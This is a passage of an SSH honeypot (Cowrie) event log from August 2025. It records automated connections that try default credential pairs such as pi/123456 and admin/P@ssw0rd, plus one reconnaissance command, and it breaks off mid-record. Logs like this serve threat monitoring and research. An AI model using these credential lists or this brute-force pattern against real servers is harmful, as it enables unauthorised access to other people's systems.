{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57250,"dst_ip":"1.2.3.4","dst_port":22,"session":"44a21782abaa","protocol":"ssh","message":"New connection: 212.227.125.160:57250 (1.2.3.4:22) [session: 44a21782abaa]","sensor":"my-vps","timestamp":"2025-08-31T07:07:14.015249Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:14.015985Z","src_ip":"212.227.125.160","session":"44a21782abaa"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:14.094107Z","src_ip":"212.227.125.160","session":"44a21782abaa"}
{"eventid":"cowrie.login.failed","username":"pi","password":"123456","message":"login attempt [pi/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:14.304509Z","src_ip":"212.227.125.160","session":"3e8ea57bb37b"}
{"eventid":"cowrie.login.failed","username":"student","password":"1234567","message":"login attempt [student/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:14.353655Z","src_ip":"212.227.125.160","session":"44a21782abaa"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:14.479576Z","src_ip":"212.227.125.160","session":"29e5a163caf7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57252,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8e99361076d","protocol":"ssh","message":"New connection: 212.227.125.160:57252 (1.2.3.4:22) [session: e8e99361076d]","sensor":"my-vps","timestamp":"2025-08-31T07:07:14.527120Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:14.587942Z","src_ip":"212.227.125.160","session":"e8e99361076d"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:14.588720Z","src_ip":"212.227.125.160","session":"e8e99361076d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234567","message":"login attempt [admin/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:14.925750Z","src_ip":"212.227.125.160","session":"e8e99361076d"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:15.414382Z","src_ip":"212.227.125.160","session":"3e8ea57bb37b"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:15.435816Z","src_ip":"212.227.125.160","session":"44a21782abaa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57256,"dst_ip":"1.2.3.4","dst_port":22,"session":"666b38e3e63a","protocol":"ssh","message":"New connection: 212.227.125.160:57256 (1.2.3.4:22) [session: 666b38e3e63a]","sensor":"my-vps","timestamp":"2025-08-31T07:07:15.465402Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:07:15.494895Z","src_ip":"201.148.180.50","session":"3e623b12406d"}
{"eventid":"cowrie.command.input","input":"mount | head -5","message":"CMD: mount | head -5","sensor":"my-vps","timestamp":"2025-08-31T07:07:15.495728Z","src_ip":"201.148.180.50","session":"3e623b12406d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57258,"dst_ip":"1.2.3.4","dst_port":22,"session":"3aeed38a2d42","protocol":"ssh","message":"New connection: 212.227.125.160:57258 (1.2.3.4:22) [session: 3aeed38a2d42]","sensor":"my-vps","timestamp":"2025-08-31T07:07:15.499608Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:15.501578Z","src_ip":"212.227.125.160","session":"666b38e3e63a"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:15.539258Z","src_ip":"212.227.125.160","session":"3aeed38a2d42"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:15.545554Z","src_ip":"212.227.125.160","session":"666b38e3e63a"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:15.575752Z","src_ip":"212.227.125.160","session":"3aeed38a2d42"}
{"eventid":"cowrie.login.failed","username":"pi","password":"1234567","message":"login attempt [pi/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:15.800226Z","src_ip":"212.227.125.160","session":"666b38e3e63a"}
{"eventid":"cowrie.login.failed","username":"student","password":"P@ssw0rd","message":"login attempt [student/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:15.835032Z","src_ip":"212.227.125.160","session":"3aeed38a2d42"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:16.039403Z","src_ip":"212.227.125.160","session":"e8e99361076d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57266,"dst_ip":"1.2.3.4","dst_port":22,"session":"cfde9daa6a00","protocol":"ssh","message":"New connection: 212.227.125.160:57266 (1.2.3.4:22) [session: cfde9daa6a00]","sensor":"my-vps","timestamp":"2025-08-31T07:07:16.083925Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:16.123115Z","src_ip":"212.227.125.160","session":"cfde9daa6a00"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:16.153766Z","src_ip":"212.227.125.160","session":"cfde9daa6a00"}
{"eventid":"cowrie.login.failed","username":"admin","password":"P@ssw0rd","message":"login attempt [admin/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:16.437865Z","src_ip":"212.227.125.160","session":"cfde9daa6a00"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:16.877702Z","src_ip":"212.227.125.160","session":"666b38e3e63a"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:16.932465Z","src_ip":"212.227.125.160","session":"3aeed38a2d42"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57272,"dst_ip":"1.2.3.4","dst_port":22,"session":"2313d2bdc644","protocol":"ssh","message":"New connection: 212.227.125.160:57272 (1.2.3.4:22) [session: 2313d2bdc644]","sensor":"my-vps","timestamp":"2025-08-31T07:07:16.938829Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:16.971573Z","src_ip":"212.227.125.160","session":"2313d2bdc644"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57280,"dst_ip":"1.2.3.4","dst_port":22,"session":"b007d34a2c9c","protocol":"ssh","message":"New connection: 212.227.125.160:57280 (1.2.3.4:22) [session: b007d34a2c9c]","sensor":"my-vps","timestamp":"2025-08-31T07:07:16.981524Z"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:17.032196Z","src_ip":"212.227.125.160","session":"2313d2bdc644"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:17.042731Z","src_ip":"212.227.125.160","session":"b007d34a2c9c"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:17.043489Z","src_ip":"212.227.125.160","session":"b007d34a2c9c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","size":28,"shasum":"eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","duplicate":true,"duration":"1.8","message":"Closing TTY Log: var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410 after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:17.249219Z","src_ip":"201.148.180.50","session":"3e623b12406d"}
{"eventid":"cowrie.session.closed","duration":"12.9","message":"Connection lost after 12.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:17.318280Z","src_ip":"201.148.180.50","session":"3e623b12406d"}
{"eventid":"cowrie.login.failed","username":"pi","password":"P@ssw0rd","message":"login attempt [pi/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:17.349924Z","src_ip":"212.227.125.160","session":"2313d2bdc644"}
{"eventid":"cowrie.login.failed","username":"student","password":"1234","message":"login attempt [student/1234] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:17.401485Z","src_ip":"212.227.125.160","session":"b007d34a2c9c"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:17.531377Z","src_ip":"212.227.125.160","session":"cfde9daa6a00"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57296,"dst_ip":"1.2.3.4","dst_port":22,"session":"060e9e5d2673","protocol":"ssh","message":"New connection: 212.227.125.160:57296 (1.2.3.4:22) [session: 060e9e5d2673]","sensor":"my-vps","timestamp":"2025-08-31T07:07:17.584146Z"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:18.320795Z","src_ip":"212.227.235.229","session":"9fa971dbb4f0"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:18.846342Z","src_ip":"212.227.125.160","session":"2313d2bdc644"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37720,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3e26bc38f51","protocol":"ssh","message":"New connection: 212.227.125.160:37720 (1.2.3.4:22) [session: b3e26bc38f51]","sensor":"my-vps","timestamp":"2025-08-31T07:07:18.969348Z"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:19.029449Z","src_ip":"212.227.125.160","session":"b007d34a2c9c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37736,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ef5d6674c01","protocol":"ssh","message":"New connection: 212.227.125.160:37736 (1.2.3.4:22) [session: 7ef5d6674c01]","sensor":"my-vps","timestamp":"2025-08-31T07:07:19.111093Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:19.753429Z","src_ip":"212.227.125.160","session":"b3e26bc38f51"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:19.781689Z","src_ip":"212.227.125.160","session":"b3e26bc38f51"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:19.787048Z","src_ip":"212.227.125.160","session":"7ef5d6674c01"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:19.787596Z","src_ip":"212.227.125.160","session":"7ef5d6674c01"}
{"eventid":"cowrie.login.failed","username":"pi","password":"1234","message":"login attempt [pi/1234] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:20.408724Z","src_ip":"212.227.125.160","session":"b3e26bc38f51"}
{"eventid":"cowrie.login.failed","username":"student","password":"brigante","message":"login attempt [student/brigante] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:20.457113Z","src_ip":"212.227.125.160","session":"7ef5d6674c01"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36920,"dst_ip":"1.2.3.4","dst_port":22,"session":"25a098a56666","protocol":"ssh","message":"New connection: 212.227.125.160:36920 (1.2.3.4:22) [session: 25a098a56666]","sensor":"my-vps","timestamp":"2025-08-31T07:07:20.566120Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:21.186775Z","src_ip":"212.227.125.160","session":"25a098a56666"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hell